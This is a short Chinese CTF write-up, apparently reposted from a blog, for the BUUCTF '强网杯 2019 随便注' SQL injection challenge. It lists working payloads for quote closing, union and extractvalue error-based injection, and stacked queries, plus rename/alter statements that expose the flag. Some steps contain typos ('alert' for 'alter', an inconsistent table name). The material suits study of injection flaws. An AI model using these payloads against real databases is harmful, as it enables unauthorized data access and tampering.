首页 > 其他 > 详细

buuctf | [强网杯 2019]随便注

时间:2019-10-11 22:26:27      阅读:302      评论:0      收藏:0      [点我收藏+]

1‘ and ‘0,1‘ and ‘1  : 单引号闭合

1‘ order by 3--+ : 猜字段

技术分享图片

 

  1‘ union select 1,database()# :开始注入,发现正则过滤

技术分享图片

 1‘ and extractvalue(0x0a,concat(0x0a,(database())))# :数据库 :supersqli

技术分享图片

 

 0‘;show databases;#   : 尝试一堆后发现堆叠注入 技术分享图片

 0‘;show tables;#

技术分享图片

 

然后就迷了,怎么从表中得到字段呢?后来查资料才知道,show也是可以查字段的。

技术分享图片

0‘;show columns from words;#

 技术分享图片

 0‘;show columns from `1919810931114514`;#

技术分享图片

 

 

 

技术分享图片

 好吧接下来菜鸡真的懵了,贴一位师傅的WP——强网杯2019随便注

开始复现

1.将words表改名为word1或其它任意名字 :    rename table words to new_word;

2.1919810931114514改名为words  :  rename table 1919810931114514 to new_19198;

3.将新的word表插入一列,列名为id : alter table words add id int unsigned not Null auto_increment primary key;

4.将flag列改名为data : alert table words change flag data varchar(100);

 

 

buuctf | [强网杯 2019]随便注

原文:https://www.cnblogs.com/chrysanthemum/p/11657008.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!